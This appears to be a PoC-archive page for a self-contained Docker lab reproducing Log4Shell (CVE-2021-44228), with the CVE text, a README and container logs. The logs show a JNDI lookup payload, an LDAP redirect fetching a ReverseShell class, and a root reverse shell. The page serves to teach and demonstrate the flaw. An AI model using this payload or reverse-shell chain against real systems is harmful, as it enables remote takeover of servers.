Associated Vulnerability
Title:Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)Description:Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
Self-contained lab environment that runs the exploit safely, all from docker compose
Readme
# Self-contained lab environment PoC that runs a reverse-shell with Log4Shell (CVE-2021-44228)
This is a self-contained lab environment that runs the exploit safely, all from docker compose.
The affected versions are **Apache Log4j <=2.0–2.14.1** and the CVE is tracked as **CVE-2021-44228** (CVSS score: 10.0).
### Do patch Apache Log4j to version 2.16+ asap !!!
## Prerequisites
This code requires Docker and Docker Compose.
## Description
`Dockerfile` and `docker-compose.yml` files are self-explanatory to build and start the lab environment.
Victim server [log4shell-server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/log4shell-server) is built using [spring initializr](https://start.spring.io) demo project, including Log4j 2.14.1 vulnerable version through [spring-boot-starter-log4j2 2.6.1](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/log4shell-server/build.gradle#L19).
The vulnerable code is located inside [DemoApplication.java](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/log4shell-server/src/main/java/com/example/demo/DemoApplication.java#L29).
[Remote Code Execution](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/rce-server/src/ReverseShell.java#L8) is served by the [rce-server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/rce-server).
Intermediate [LDAP server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/ldap-server) is based on [Java Unmarshaller Security - Turning your data into code execution](https://github.com/mbechler/marshalsec).
Attack vector is performed from [this script](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/attack-vector/attack-vector.sh#L13) to setup a connection to the [reverse-shell](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/reverse-shell) server.
[Reverse-shell server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/reverse-shell) waits for a connection, and sends a [command example](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/reverse-shell/reverse-shell.sh#L3) `echo $(whoami)` through the reverse shell, which is executed on the victim server [log4shell-server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/log4shell-server).
## Usage:
```bash
git clone https://github.com/j3kz/CVE-2021-44228-PoC.git
cd CVE-2021-44228-PoC
docker compose up
```
```
ldap-server | Listening on 0.0.0.0:1389
```
LDAP server ready and listening.
```
reverse-shell | listening on [::]:4242 ...
```
Reverse-shell server ready and listening.
```
log4shell-server |
log4shell-server | . ____ _ __ _ _
log4shell-server | /\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \
log4shell-server | ( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
log4shell-server | \\/ ___)| |_)| | | | | || (_| | ) ) ) )
log4shell-server | ' |____| .__|_| |_|_| |_\__, | / / / /
log4shell-server | =========|_|==============|___/=/_/_/_/
log4shell-server | :: Spring Boot :: (v2.6.1)
log4shell-server |
log4shell-server | 2021-12-18 12:31:37.695 INFO 1 --- [ main] c.e.d.DemoApplication : Starting DemoApplication using Java 1.8.0_181 on 46edaaf2f7eb with PID 1 (/app/spring-boot-application.jar started by root in /)
log4shell-server | 2021-12-18 12:31:37.739 INFO 1 --- [ main] c.e.d.DemoApplication : No active profile set, falling back to default profiles: default
log4shell-server | 2021-12-18 12:31:42.337 INFO 1 --- [ main] o.s.b.w.e.t.TomcatWebServer : Tomcat initialized with port(s): 8080 (http)
log4shell-server | 2021-12-18 12:31:42.439 INFO 1 --- [ main] o.a.c.c.StandardService : Starting service [Tomcat]
log4shell-server | 2021-12-18 12:31:42.440 INFO 1 --- [ main] o.a.c.c.StandardEngine : Starting Servlet engine: [Apache Tomcat/9.0.55]
log4shell-server | 2021-12-18 12:31:42.717 INFO 1 --- [ main] o.a.c.c.C.[.[.[/] : Initializing Spring embedded WebApplicationContext
log4shell-server | 2021-12-18 12:31:42.718 INFO 1 --- [ main] w.s.c.ServletWebServerApplicationContext : Root WebApplicationContext: initialization completed in 4549 ms
log4shell-server | 2021-12-18 12:31:44.660 INFO 1 --- [ main] o.s.b.w.e.t.TomcatWebServer : Tomcat started on port(s): 8080 (http) with context path ''
```
Vulnerable server ready and listening.
```
attack-vector | 👌 log4shell-server:8080 is listening!
attack-vector | 🚀 Sending attack vector ...
```
Attack server waiting connection and sending the attack-vector.
```
log4shell-server | 2021-12-18 12:31:44.740 INFO 1 --- [ main] c.e.d.DemoApplication : Started DemoApplication in 8.402 seconds (JVM running for 11.113)
log4shell-server | 2021-12-18 12:31:45.110 INFO 1 --- [nio-8080-exec-1] o.a.c.c.C.[.[.[/] : Initializing Spring DispatcherServlet 'dispatcherServlet'
log4shell-server | 2021-12-18 12:31:45.110 INFO 1 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet : Initializing Servlet 'dispatcherServlet'
log4shell-server | 2021-12-18 12:31:45.112 INFO 1 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet : Completed initialization in 2 ms
ldap-server | Send LDAP reference result for attack-vector redirecting to http://rce-server:3000/ReverseShell.class
rce-server | 172.31.0.3 - - [18/Dec/2021:12:31:45 +0000] "GET /ReverseShell.class HTTP/1.1" 200 891 "" "Java/1.8.0_181"
```
Vulnerable server executing request, logging it, so LDAP server is requesting RCE to the RCE server.
```
reverse-shell | connect to [::ffff:172.31.0.5]:4242 from [::ffff:172.31.0.3]:43877 ([::ffff:172.31.0.3]:43877)
reverse-shell | 👻 Hello from the log4shell-server! We are root.
reverse-shell | listening on [::]:4242 ...
reverse-shell | connect to [::ffff:172.31.0.5]:4242 from [::ffff:172.31.0.3]:41249 ([::ffff:172.31.0.3]:41249)
```
RCE is executed and victim server is opening the reverse shell, and reverse-shell server is able to execute execute distant commands.
```
log4shell-server | 2021-12-18 12:31:45.187 INFO 1 --- [nio-8080-exec-1] Demo : GET /hello param:name: ReverseShell@22fb868
log4shell-server | 2021-12-18 12:31:45.345 INFO 1 --- [nio-8080-exec-1] Demo : GET /hello header:host: log4shell-server:8080
log4shell-server | 2021-12-18 12:31:45.345 INFO 1 --- [nio-8080-exec-1] Demo : GET /hello header:user-agent: curl/7.80.0
log4shell-server | 2021-12-18 12:31:45.345 INFO 1 --- [nio-8080-exec-1] Demo : GET /hello header:accept: */*
```
Victim server is logging the attack vector request.
```
attack-vector | 🔥 Server returned:
attack-vector | > HTTP/1.1 200
attack-vector | > Content-Type: text/plain;charset=UTF-8
attack-vector | > Content-Length: 52
attack-vector | > Date: Sat, 18 Dec 2021 12:31:45 GMT
attack-vector | >
attack-vector | > Hello ${jndi:ldap://ldap-server:1389/attack-vector}!
attack-vector | Attack should be successfull, have a nice day!
```
Attack vector request is logging the response, and leaves the party.
## Disclaimer
This repository is only about learning from the vulnerability.
The project is not intended to be and cannot be used as a malicious exploit of the CVE-2021-44228 without the consentment of victim server's owner.
**Any usage for malicious activity is prohibited and punished by severe laws.**
## References
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/
https://github.com/christophetd/log4shell-vulnerable-app
File Snapshot
[4.0K] /data/pocs/33bee60811603a4bac855180b18306ac9b6e7b16
├── [4.0K] attack-vector
│ ├── [ 682] attack-vector.sh
│ └── [ 116] Dockerfile
├── [1.2K] docker-compose.yml
├── [4.0K] ldap-server
│ └── [ 546] Dockerfile
├── [ 37K] LICENCE
├── [4.0K] log4shell-server
│ ├── [ 597] build.gradle
│ ├── [ 332] Dockerfile
│ ├── [4.0K] gradle
│ │ └── [4.0K] wrapper
│ │ ├── [ 58K] gradle-wrapper.jar
│ │ └── [ 202] gradle-wrapper.properties
│ ├── [7.9K] gradlew
│ ├── [2.7K] gradlew.bat
│ ├── [ 26] settings.gradle
│ └── [4.0K] src
│ ├── [4.0K] main
│ │ ├── [4.0K] java
│ │ │ └── [4.0K] com
│ │ │ └── [4.0K] example
│ │ │ └── [4.0K] demo
│ │ │ └── [1.1K] DemoApplication.java
│ │ └── [4.0K] resources
│ │ └── [ 1] application.properties
│ └── [4.0K] test
│ └── [4.0K] java
│ └── [4.0K] com
│ └── [4.0K] example
│ └── [4.0K] demo
│ └── [ 206] DemoApplicationTests.java
├── [4.0K] rce-server
│ ├── [ 770] Dockerfile
│ └── [4.0K] src
│ └── [ 678] ReverseShell.java
├── [7.9K] README.md
└── [4.0K] reverse-shell
├── [ 88] Dockerfile
└── [ 157] reverse-shell.sh
20 directories, 20 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →